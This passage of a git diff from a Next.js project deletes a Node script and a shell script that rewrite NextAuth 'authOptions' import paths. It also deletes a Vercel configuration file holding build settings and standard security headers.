{ - try { - let content = fs.readFileSync(filePath, 'utf8'); - let updated = false; - - // Update absolute imports - if (content.includes('import { authOptions } from "@/app/api/auth/[...nextauth]/route"')) { - content = content.replace( - 'import { authOptions } from "@/app/api/auth/[...nextauth]/route"', - 'import { authOptions } from "@/app/api/auth/options"' - ); - updated = true; - } - - // Update relative imports - if (content.includes('import { authOptions } from "../../auth/[...nextauth]/route"')) { - content = content.replace( - 'import { authOptions } from "../../auth/[...nextauth]/route"', - 'import { authOptions } from "../../auth/options"' - ); - updated = true; - } - - // Other possible relative paths - const patterns = [ - /import\s*{\s*authOptions\s*}\s*from\s*['"](.*)\/auth\/\[\.\.\.\S+\]\/route['"]/g, - /import\s*{\s*authOptions\s*}\s*from\s*['"](.*)\[...\S+\]\/route['"]/g - ]; - - for (const pattern of patterns) { - const matches = content.matchAll(pattern); - for (const match of matches) { - const fullMatch = match[0]; - const basePath = match[1]; - const replacement = `import { authOptions } from "${basePath}/auth/options"`; - content = content.replace(fullMatch, replacement); - updated = true; - } - } - - if (updated) { - fs.writeFileSync(filePath, content, 'utf8'); - console.log(`Updated: ${filePath}`); - return true; - } - - return false; - } catch (error) { - console.error(`Error updating ${filePath}:`, error); - return false; - } -} - -// Main function -function main() { - const rootDir = './app'; - const libDir = './lib'; - - const tsFiles = [ - ...findTsFiles(rootDir), - ...findTsFiles(libDir) - ]; - - let updatedCount = 0; - - tsFiles.forEach(file => { - if (updateImportInFile(file)) { - updatedCount++; - } - }); - - console.log(`\nCompleted! Updated ${updatedCount} files.`); -} - -main(); \ No newline at end of file diff --git a/update-imports.sh b/update-imports.sh deleted file mode 100755 index 74db781..0000000 --- a/update-imports.sh +++ /dev/null @@ -1,7 +0,0 @@ -#!/bin/bash - -# Find all TypeScript files in the app directory -find ./app -type f -name "*.ts*" -print0 | xargs -0 sed -i '' 's|import { authOptions } from "@/app/api/auth/\\[...nextauth\\]/route";|import { authOptions } from "@/app/api/auth/options";|g' -find ./app -type f -name "*.ts*" -print0 | xargs -0 sed -i '' 's|import { authOptions } from "../../auth/\\[...nextauth\\]/route";|import { authOptions } from "../../auth/options";|g' - -echo "Updated authOptions imports in all files." \ No newline at end of file diff --git a/vercel.json b/vercel.json deleted file mode 100644 index cbf2dd6..0000000 --- a/vercel.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "buildCommand": "npm run build", - "devCommand": "npm run dev", - "installCommand": "npm ci", - "framework": "nextjs", - "regions": ["cdg1"], - "env": { - "NEXT_TELEMETRY_DISABLED": "1" - }, - "functions": { - "app/**/*.ts": { - "maxDuration": 30 - }, - "app/**/*.tsx": { - "maxDuration": 30 - } - }, - "headers": [ - { - "source": "/(.*)", - "headers": [ - { - "key": "X-Content-Type-Options", - "value": "nosniff" - }, - { - "key": "X-Frame-Options", - "value": "SAMEORIGIN" - }, - { - "key": "X-XSS-Protection", - "value": "1; mode=block" - }, - { - "key": "Referrer-Policy", - "value": "strict-origin-when-cross-origin" - } - ] - } - ], - "rewrites": [ - { - "source": "/api/:path*", - "destination": "/api/:path*" - } - ] -}